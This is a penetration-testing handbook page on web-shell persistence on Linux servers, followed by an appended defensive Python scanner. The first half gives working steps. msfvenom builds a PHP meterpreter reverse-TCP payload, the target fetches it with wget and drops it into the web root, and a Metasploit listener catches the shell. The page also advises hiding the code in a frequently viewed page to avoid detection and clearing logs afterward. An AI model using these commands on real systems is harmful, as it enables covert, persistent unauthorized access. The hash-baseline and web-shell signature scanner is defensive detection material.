handbook/tools/5.Machine/1.Linux/General/Exploitation/2.Persistence/4.Web-Shell-BackDoor.md
2024-08-30 23:07:22 +00:00
## General
A web shell is a type of backdoor that allows an attacker to remotely control a compromised system through a web browser. A web shell is typically a script, written in a language such as PHP or ASP, that is uploaded to a web server. Once the script is uploaded, the attacker can use a web browser to connect to the server and execute commands on the system through the web shell.
Web shells can be used to maintain persistence on a compromised system by providing the attacker with a way to remotely access and control the system over an extended period of time. The web shell can be configured to start automatically when the system is booted, or it can be triggered manually by the attacker whenever they want to access the system.
Web shells can be used to perform a variety of malicious actions, such as uploading and downloading files, modifying system settings, and executing arbitrary code on the system. They can also be used to gather sensitive information, such as passwords and other sensitive data.
## Commands
Requirement: the target must already be running a web server for this persistence method to work.
Meterpreter Backdoor
```
# Generate the payload (msfvenom, not msfconsole, takes -p/-e/-f)
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -e php/base64 -f raw > Evilbackup.php   # PHP payload; pick the payload that matches the server's language
# Edit the payload (wrap it in PHP tags)
<?php
PAYLOAD
?>
# Transfer the file to the target machine (python3 http.server listens on port 8000 by default)
python3 -m http.server
# On the target: fetch the file and place it under the web root
wget http://IP:8000/Evilbackup.php
chmod +x Evilbackup.php
mv Evilbackup.php /var/www/html/
```
Note that you could also add the code to a page that is viewed often; this can evade detection, since you are not creating a new file and the code is hidden among other code.
Use the web shell (set up a listener)
```
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp   # also set LHOST and LPORT
run
```
===Don't forget to clear tracks (check [[🧹 CLEAR Logs & History]])===
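Detecting this persistence from the defender's side, as an added example that is not part of this handbook page: the script below snapshots a web root's file hashes while the site is known-good, then reports new, modified and deleted files and greps server-side files for the `eval(base64_decode(...))` shape that the `-e php/base64` encoder produces. The hash baseline is what catches the "inject into an often-viewed page" variant, because the edited page need not contain any signature-matching string; the web root, pattern list and the files written in `demo()` are all constructed for the example.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# The page's payload is built with -e php/base64 and wrapped in PHP tags, so
# eval(base64_decode(...)) is its expected shape; the second pattern covers
# command execution fed straight from a request parameter.
SUSPICIOUS_PATTERNS = [
    re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("),
    re.compile(rb"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)"),
]
WEB_EXTENSIONS = {".php", ".phtml", ".php5", ".phar", ".inc"}

def build_baseline(webroot: str) -> dict:
    """Relative path -> SHA-256 for every file under the web root; record it while the site is known-good."""
    root = Path(webroot)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def scan_webroot(webroot: str, baseline: dict) -> dict:
    """Diff the web root against the baseline and grep server-side files for web-shell indicators."""
    root = Path(webroot)
    current = build_baseline(webroot)
    report = {"new": [], "modified": [], "deleted": [], "suspicious": []}
    for rel, digest in current.items():
        if rel not in baseline:
            report["new"].append(rel)
        elif baseline[rel] != digest:
            report["modified"].append(rel)  # also catches code injected into an existing page
        if Path(rel).suffix.lower() in WEB_EXTENSIONS:
            if any(p.search((root / rel).read_bytes()) for p in SUSPICIOUS_PATTERNS):
                report["suspicious"].append(rel)
    report["deleted"] = [rel for rel in baseline if rel not in current]
    return {k: sorted(v) for k, v in report.items()}

def demo() -> dict:
    """Constructed sample: baseline a one-page site, then add a new encoded file and edit the existing page."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php echo 'welcome'; ?>\n")
        good = build_baseline(tmp)
        # 'ZWNobyAxOw==' decodes to the harmless PHP statement: echo 1;
        (root / "Evilbackup.php").write_text("<?php eval(base64_decode('ZWNobyAxOw==')); ?>\n")
        (root / "index.php").write_text("<?php echo 'welcome'; ?>\n<?php echo 'edited'; ?>\n")
        return scan_webroot(tmp, good)

if __name__ == "__main__":
    print(demo())
```

In `demo()` the edited `index.php` matches no content pattern and is only reported because its hash changed, which is why the baseline should be taken from a clean deployment and stored off the web host.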